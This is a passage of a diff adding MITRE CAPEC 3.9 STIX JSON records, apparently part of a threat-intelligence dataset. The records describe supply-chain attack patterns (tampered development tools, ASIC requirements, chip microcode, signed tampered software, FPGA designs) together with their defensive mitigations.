"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--68dcbb61-cb52-4b46-944a-9941a87a33bf", + "target_ref": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811480e0-f4e5-4e2a-8c32-b4c4872290a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid giving elevated privileges to developers.", + "id": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59b5ad85-0960-462a-b666-4bbdcb872db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user’s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.", + "external_references": [ + { + "external_id": "CAPEC-671", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/671.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Requirements for ASIC Functionality Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary with access to ASIC functionality requirements for various customers, targets a particular customer’s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer’s capability needs." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based." + ], + "x_capec_skills_required": { + "High": "An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.", + "id": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.", + "id": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b255e16-36f0-474d-bfe4-bd6900df7834", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that provenance of COTS microelectronic components be known whenever procured.", + "id": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28128c02-5503-416d-842c-89eb9c15bd31", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.", + "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-672-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89691446-aa5b-4b3c-9328-d26c0db95284", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bfab0ef2-0fc0-4e7c-a0a5-2eed4b5e3aa0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.\n This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.\n ", + "external_references": [ + { + "external_id": "CAPEC-673", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/673.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + } + ], + "id": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Developer Signing Maliciously Altered Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary who has infiltrated an organization’s build environment maliciously alters code intended to be included in a product’s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. The recipient of the software product, an end user/customer, believes the software to reflect the developer’s intent with respect to functionality unaware of the adversary’s malicious intent harbored within.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built." + ], + "x_capec_skills_required": { + "High": "The adversary must have the skills to infiltrate a developer’s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.", + "id": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8158f676-c4e7-47f8-94d3-fce6ae844da7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ intrusion detection and malware detection capabilities on IDE systems where feasible.", + "id": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e27a3eac-c3d2-4400-b058-e2708bb41600", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a4ab3ee8-bb69-4118-8ae0-48c15fa7c16d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.", + "id": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-674-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df0ce1ec-3322-4b0a-9e1d-fa7dcddce433", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--228b9edf-0a87-42c6-b3df-817ef320b28f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4f482f0-9628-4ce5-bf90-cc5a98776506", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization’s intellectual property, employee data, and other types of controlled information. Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system.\n ", + 